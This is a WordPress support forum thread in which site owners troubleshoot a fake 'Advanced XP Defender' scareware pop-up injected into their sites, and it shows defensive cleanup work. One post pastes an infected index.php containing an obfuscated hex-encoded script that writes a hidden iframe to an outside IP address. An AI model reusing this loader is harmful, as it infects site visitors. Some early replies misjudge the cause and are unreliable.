WordPress.org

Ready to get started?Download WordPress

Forums

advanced xp defender (31 posts)

  1. gmatkin
    Member
    Posted 6 years ago #

    My weblog http://intheboatshed.net seems to have been infected with some sort of Trojan, and I'd be most grateful for advice urgently.

    The thing pops up when I hit the admin and view site links, and I guess it's probably infective readers' computers as I write.

    What happens is that a message appears that reads:

    Attention! You have not completed the virus scan!
    Your PC is still infected with spyware!

    Please return to advancedxpdefender.com and downloat Advanced XP Defender scanner.

    When I click that off using the top-right-hand cross it seems to have another go.

    Now, I know this is not happening on my main computer only, as I've tested it on my second computer. I also know that my spyware detector is picking it up as a Trojan, that appears to come from my weblog.

    Has it been hacked, and if so what should I do please?

    Thanks,

    Gavin

  2. gmatkin
    Member
    Posted 6 years ago #

    I've changed my password, replaced the theme, and scanned my computer.

    I really don't know what else to do - would reinstalling WordPress help, do you think?

    Gav

  3. iridiax
    Member
    Posted 6 years ago #

    If it happens on websites other than your own, then your computer may be the one infected. If it is only your website, then the bad stuff may be hiding inside your WordPress files (theme and/or core), in your WordPress folders, in your database, or hiding somewhere else on your website.

  4. mikey1
    Member
    Posted 6 years ago #

    Hi there, I think you may want to take a look at this.
    http://www.2-spyware.com/remove-advanced-xp-defender.html

    Basically its a scam !!
    Hope it helps. Mike.

  5. gmatkin
    Member
    Posted 6 years ago #

    Thanks everyone.

    It was in the weblog and I fixed the immediate problem by reinstalling Wp 2.51, and changed my password for something more difficult.

    My question remains: how did it get in there? Did I install an infected plugin? Did I get hacked? If it happens to anyone else, at least we'll know what to do.

    Gav

  6. iridiax
    Member
    Posted 6 years ago #

    I myself would like to know how people with 2.5.1 are getting hacked.

  7. mikey1
    Member
    Posted 6 years ago #

    I don't personally think that advanced xp defender is about hacking.
    Simply because its a known spyware and not a virus.
    Spyware has to be in something we download and can't be injected into our systems by hacking.
    I'm glad that Gav appears to have resolved the problem.
    Night all. Mike.

  8. TWRO
    Member
    Posted 6 years ago #

    I've got this same problem. I've re-installed wordpress and scanned my PC with Spyware Doctor yet the problem continues. Could anyone help me please?

  9. mikey1
    Member
    Posted 6 years ago #

  10. TWRO
    Member
    Posted 6 years ago #

    I did everything last night and it appeared to have worked. Yet today when I clicked around it popped back up again. I have no clue what to do now.

    I mean its only on my site I get this pop up.

  11. mikey1
    Member
    Posted 6 years ago #

    you could try an excellent anti spyware program like
    super anti spyware which is free and very powerful.
    its available at the above link.
    usually finds everything.
    if its appearing on only your website. try clearing cookies and your cache. If I hear any more about this one I will post back.
    mike.

  12. mikey1
    Member
    Posted 6 years ago #

    The following info is important in getting rid of this spyware.
    http://removal-tool.com/advanced-xp-defender/

    hope we can get rid of it once and for all.
    mike.

  13. TWRO
    Member
    Posted 6 years ago #

    It helped but when I went on my site today it is back again! I just don't know anymore.

    Here is the site: http://thewrestlingreviewonline.com/

  14. mikey1
    Member
    Posted 6 years ago #

    Hi again, well it sounds as though its lurking somewhere.
    i would use the removal tools again, and also make sure you scan all drives, not just c:/
    Also out of interest what browser ae you using?
    If you have a different browser on your computer see if it appears with that also. There are known loopholes in currnt browsers that can let this kind of virulant spyware through.
    I'm sorry that it is still appearing, but really, can only advise to keep cleaning and perhaps try a better spware software. will clear out most things
    Super anti spyware is free and will clear out most things.
    http://www.superantispyware.com/
    I did this yesterday and found 159, so it really is important
    to regularly scan for these things.
    Keep us posted on what happens.I'm still researching this particular
    type and will post if I find a better fix.
    mike.

  15. skaterkee
    Member
    Posted 6 years ago #

    This just happened to me, and to the guys posting all the removal tools - its not a case of it being on our pc systems. It is somehow in the wordpress installation and popping up only to visitors on the site.

    My guess is we've downloaded a plugin that has this little beastie inside it somehow and we've installed it on our blogs. Whether this was deliberate or not I don't know.

    Something even more strange is my blog is also a wrestling blog, but I'll put that down to coincidence.

    All I can say is list all the plugins, themes and mods you have installed and see if any crossover. Firstly I'm gonna go through everything and see if I can find it.

    I must say this is extremely worrying, I've only been using wordpress for 3 weeks after being told it was the easiest and most secure - obviously not.

  16. skaterkee
    Member
    Posted 6 years ago #

    Holly crap - upon making backup it has somehow locked all the files from being edited - I'm actually scared now. My site is my main income.

  17. skaterkee
    Member
    Posted 6 years ago #

    Well I just replaced the index.php with a backup and it went away but I don't think it'll be gone for long because I have no idea how it got there.

  18. denissi
    Member
    Posted 6 years ago #

    The problem is not with your wp version or anything... it just happened on a few of our drupal based sites and also a custom coded asp site - we are guessing it has something to do with our ftp info being shared. we're trying multiple things and will keep you guys posted as well. Please hit us up if any of you find the issue. - Thanks alot [Danish]

  19. kalapacengkir
    Member
    Posted 6 years ago #

    guys, thanks for discussing this problem online. i have the same problem. it has come to my attention that it only poped-up when i was currently browsing my site or when i was about to leave.

    just to make sure, i've used AntiVir, Malwarebytes' Anti-Malware and Spybot to check but they found nothing.

    so, here's the idea to trace, how about we compare the version of wordpress and active plugins we used?

    here's mine:
    Wordpress 2.5.1
    Calendar 2.0
    cforms 8.5.1
    Exec-PHP 4.7
    GetWeather 1.2.1
    Image Counter 1.0
    My Link Order 2.5.1
    NextGEN Gallery 0.96
    Pagebar2 2.20
    pageMash 1.1.3
    Ryans Suckerfish WordPress Dropdown Menu 1.6.6
    Search Hilite 1.5
    Simple Archive Generator 3.2
    Simple Cache 1.0
    TinyMCE Advanced 3.0.1
    Truncate Title 1.0
    WP-Highslide 1.28
    WP-Print 2.30
    WP-UserOnline 2.30

    regards,
    kalapacengkir

  20. kalapacengkir
    Member
    Posted 6 years ago #

    a little update guys..

    i found that it changed 4 files (on online server),
    \public_html\index.php
    \public_html\wp-admin\index.php
    \public_html\wp-content\index.html
    \public_html\wp-includes\index.html
    by inserting some scripts.

    this is my changed index.php

    <?php
    /* Short and sweet */
    define('WP_USE_THEMES', true);
    require('./wp-blog-header.php');
    ?><script>
    <!--
    var d=document,kol=561;
    function O10H485A55AFF19D2(H485A55AFF21B6){ var H485A55AFF25B0 = 16; return( parseInt(H485A55AFF21B6,H485A55AFF25B0));}function H485A55AFF2DA8(H485A55AFF31A5){ var H485A55AFF359E='';for(H485A55AFF3999=0; H485A55AFF3999<H485A55AFF31A5.length; H485A55AFF3999+=2){ H485A55AFF359E += ( String.fromCharCode (O10H485A55AFF19D2(H485A55AFF31A5.substr(H485A55AFF3999, 2))));}return H485A55AFF359E;} document.write(H485A55AFF2DA8('3C7363726970743E696628216D796961297B642E777269746528273C494652414D45206E616D653D4F31207372633D5C27687474703A2F2F37372E3232312E3133332E3137312F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A3337393532292B2766333434395C272077696474683D353933206865696768743D3634207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F494652414D45203E27293B7D766172206D7969613D747275653B3C2F7363726970743E'));
    //-->
    </script>

    regards,
    kalapacengkir

  21. TWRO
    Member
    Posted 6 years ago #

    It's not just exclusive to WordPress. I uploaded HTML files and it still appeared on them. I think it just ruins your whole server and adds that script to your files.

  22. rofenstein
    Member
    Posted 6 years ago #

    I've been struggling with this one too, but might(!) have solved it.

    Couple of days ago this popped up on my custom coded php website. I'm running on a windows server and integrated into my site are 2 copies of wordpress and 1 copy of phpBB. The only WordPress plugin running was akismet.

    It seems to mainly infect files (see code in post above) with the prefix index, regardless of the extension. However, it did appear in login.php of phpbb.

    Initially I thought this was an injection attack. So I removed all the hacked code from the infected files and upgraded to latest version of wordpress and phpBB.

    We also have a custom form that uses a formmail script. I tightened up the validation on all the fields, and restricted the entry for fields to no more that 35 characters.

    I thought this has solved it, until the next morning when it reappeared!

    I then upgraded the formmail script, deleted any old files via FTP, changed ftp passwords and removed any other FTP users.

    I also ran a spyware scanner on our server... Which is the key bit...
    It picked up 2 trojans one of them being 'advanced xp defender'.

    So far (fingers crossed) we haven't been re-infected.

    I suggest that if you are having this problem that you:

    • Remove all malicious code from infected files
    • Upgrade to the latest version of wordpress/ other open source apps
    • Change FTP passwords
    • Upgrade plugins
    • Disable plugins that use forms on the front end
    • Delete any old files on your server
    • Ensure any custom forms use validation and the latest scripts
    • Get your host to perform a virus/spyware scan on their server

    The spyware app I used was Spyware doctor from PCtools.

    Hope this helps.

  23. kalapacengkir
    Member
    Posted 6 years ago #

    @rofenstein
    thanks a lot, it's crystal clear.

    it's been 2 days since i tried to fix mine, no pop-up anymore.

    actually i'd removed that script once before, but pop-up kept showing. then i remembered that i'd used cracked ftp client! having that in mind, i threw the old one, switched to filezilla, removed that script and then changed my ftp password.

    as i found out (via googling) that even a hand-made and also a 2-years-safe site had been infected, i guess what we've uploaded (cms) is not suspected anymore. now only 2 left, uploading process, and the server itself.

    i guess we'll find out shortly what the real problem is. for now, i recommend you to
    - try to change ftp client
    - remove script from infected file, and then
    - change ftp password

    can't wait to hear news from you guys..

    hope this helps, too.

  24. skaterkee
    Member
    Posted 6 years ago #

    Thanks for the help I'm in the process of fixing it now but my site has been labeled as dangerous by google :(

  25. skaterkee
    Member
    Posted 6 years ago #

    May I ask how you scanned you server for spyware?

  26. rofenstein
    Member
    Posted 6 years ago #

    Skaterkee, we have our own dedicated server, which means access like a normal computer. If you're on shared hosting -contact your host to perform a scan.

  27. skaterkee
    Member
    Posted 6 years ago #

    That'll take two weeks knowing hostgator.

    Do you know if there's a way to check wordpress's database for abnormalities?

  28. skaterkee
    Member
    Posted 6 years ago #

    God sakes, my host went off on one and deleted everything off my account.

  29. falguni1
    Member
    Posted 6 years ago #

  30. falguni1
    Member
    Posted 6 years ago #

Topic Closed

This topic has been closed to new replies.

About this Topic